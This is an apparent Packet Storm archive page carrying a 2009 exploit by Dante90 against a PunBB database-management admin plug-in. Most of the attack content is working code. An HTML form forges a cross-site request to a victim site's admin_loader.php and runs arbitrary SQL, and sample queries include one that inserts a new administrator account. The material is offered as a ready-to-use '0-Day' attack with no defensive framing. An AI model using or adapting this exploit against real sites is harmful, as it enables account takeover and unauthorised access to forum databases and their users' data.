what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PunBB AP_DB_management.php SQL Injection

PunBB AP_DB_management.php SQL Injection
Posted Jun 29, 2009
Authored by Dante90 | Site warwolfz.org

PunBB suffers from a remote SQL injection vulnerability when leveraging a cross site request forgery vulnerability in AP_DB_management.php.

tags | exploit, remote, php, sql injection, csrf
SHA-256 | 5af98f2038d18971688979435e4efa2008d7b0edf2049ff2935b7f174f41d684

PunBB AP_DB_management.php SQL Injection

Change Mirror Download
######################################################################################
#
#
# Author: Dante90, WaRWolFz
Crew #
# Title: PunBB (AP_DB_management.php) Remote SQL Injection CSRF By Dante90
[0-Day] #
# MSN: dante90.dmc4@hotmail.it
#
# Web: www.warwolfz.org
#
#
#
######################################################################################

[0-Day & Priv8] PunBB Administration Plug-In (AP_DB_management.php) Remote
SQL Injection CSRF Exploit By Dante90

[code]

<html>
<head>
<title>[0-Day & Priv8] PunBB Administration Plug-In
(AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>
</head>
<body>
<center><fieldset>
<legend>Run SQL query</legend>
<form name="Dante90" method="post" action="
http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php
">
<textarea name="this_query" rows="5" cols="50">

[SQL_Injection]

</textarea>
<input type="submit" name="submit" value="Run query" />
</form>
</fieldset></center>
</body>
</html>

[/code]

[SQL_Injection] = Insert the SQL Injection

Example of SQL Injection:

[code]
SELECT * FROM users WHERE id=2;

SELECT * FROM users WHERE group_id=1;

INSERT INTO users (group_id, username, password, email, num_posts,
registration_ip, last_visit) VALUES(1, '[NICK_NEW_ADMIN]',
'md5("[PASSWORD_NEW_ADMIN]")', '[E-MAIL_NEW_ADMIN]', 1, '127.0.0.1',
'1220984516');
[/code]

[NICK_NEW_ADMIN] = New Administrator's Nick

[PASSWORD_NEW_ADMIN] = New Administrator's Password

[E-MAIL_NEW_ADMIN] = New Administrator's E-Mail


Dante90
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close